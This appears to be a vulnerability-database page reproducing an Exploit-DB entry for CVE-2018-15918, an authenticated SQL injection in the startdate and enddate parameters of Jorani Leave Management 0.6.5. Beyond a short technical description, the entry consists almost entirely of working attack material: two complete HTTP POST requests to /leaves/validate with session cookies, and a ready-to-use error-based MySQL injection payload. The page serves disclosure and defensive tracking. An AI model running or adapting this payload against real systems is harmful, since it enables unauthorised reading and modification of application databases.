Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Jorani Leave Management 0.6.5 - (Authenticated) 'startdate' SQL Injection

🗓️ 06 Sep 2018 00:00:00Reported by Javier OlmedoType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 26 Views

Jorani Leave Management 0.6.5 SQL Injection Exploi

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Jorani Leave Management 0.6.5 - startdate SQL Injection Vulnerability
6 Sep 201800:00
zdt
Circl		CVE-2018-15918
6 Sep 201800:00
circl
CVE		CVE-2018-15918
5 Sep 201821:00
cve
Cvelist		CVE-2018-15918
5 Sep 201821:00
cvelist
EUVD		EUVD-2018-7774
7 Oct 202500:30
euvd
exploitpack		Jorani Leave Management 0.6.5 - (Authenticated) startdate SQL Injection
6 Sep 201800:00
exploitpack
NVD		CVE-2018-15918
5 Sep 201821:29
nvd
OSV		CVE-2018-15918
5 Sep 201821:29
osv
Packet Storm		Jorani Leave Management System 0.6.5 SQL Injection
6 Sep 201800:00
packetstorm
Prion		Sql injection
5 Sep 201821:29
prion
Rows per page
# Exploit Title: Jorani Leave Management 0.6.5 – 'startdate' SQL Injection
# Exploit Author: Javier Olmedo
# Website: https://hackpuntes.com
# Date: 2018-09-06
# Google Dork: N/A
# Vendor: Benjamin BALET
# Software Link: https://jorani.org/download.html
# Affected Version: 0.6.5 and possibly before
# Patched Version: unpatched
# Category: Web Application
# Platform: Windows
# Tested on: Win10x64 & Kali Linux
# CVE: 2018-15918
# Reference:
# https://hackpuntes.com/cve-2018-15918-jorani-leave-management-system-0-6-5-sql-injection/
# https://github.com/bbalet/jorani/issues/254
  
# 1. Technical Description:
# Jorani Leave Management System 0.6.5 and possibly before are affected by SQL Injection in startdate
# and enddate parameters through POST request in "/leaves/validate" resource.
# This allows a user of the application without permissions to read and modify sensitive information from
# the database used by the application.
  
# 2. Proof Of Concept (PoC):
# 2.1 The following POST request generates an error 500 in the Application (add ' in startdate parameter)
---
POST /leaves/validate HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/leaves/create
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 167
Cookie: csrf_cookie_jorani=521d82ffceaee171d5ff3c5c817c3dfd; jorani_session=r8ofjpch4g93t6563t7ols6fBkeeommo;
Connection: close

csrf_cookie_jorani=521d82ffceaee171d5ff3c5c817c3dfd&id=1&type=compensate&startdate=2018-08-02'&enddate=2018-08-03
&startdatetype=Morning&enddatetype=Afternoon&leave_id=
---

# 2.2 In another request, add two ' to receive a code 200 OK
---
POST /leaves/validate HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/leaves/create
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 167
Cookie: csrf_cookie_jorani=521d82ffceaee171d5ff3c5c817c3dfd; jorani_session=r8ofjpch4g93t6563t7ols6fBkeeommo;
Connection: close

csrf_cookie_jorani=521d82ffceaee171d5ff3c5c817c3dfd&id=1&type=compensate&startdate=2018-08-02''&enddate=2018-08-03
&startdatetype=Morning&enddatetype=Afternoon&leave_id=
---
 
# 3. Payload:
# Parameters: startdate and enddate (POST)
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Payload:
id=1&type=compensate&startdate=2018-08-02&enddate=2018-08-03') AND (SELECT 2138 FROM (SELECT COUNT(*),CONCAT(0x7178787071,
(SELECT (ELT(2138=2138,1))),0x716b716271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND
('WfLI'='WfLI&startdatetype=Morning&enddatetype=Afternoon&leave_id=

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
06 Sep 2018 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 35.4
CVSS 25.5
EPSS0.0022
jorani leave managementsql injectionexploitauthenticatedweb applicationwindowskali linuxcve-2018-15918vulnerabilitypatchedbenjamin balet.
26